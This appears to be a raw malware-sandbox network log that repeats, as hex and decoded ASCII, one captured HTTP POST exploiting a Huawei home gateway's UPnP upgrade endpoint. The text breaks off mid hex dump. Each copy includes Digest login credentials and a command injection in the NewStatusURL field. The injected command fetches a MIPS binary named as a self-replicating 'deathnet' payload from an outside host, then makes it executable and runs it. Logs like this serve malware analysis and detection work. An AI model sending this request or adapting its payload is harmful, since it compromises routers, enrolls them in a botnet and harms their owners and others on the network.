64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 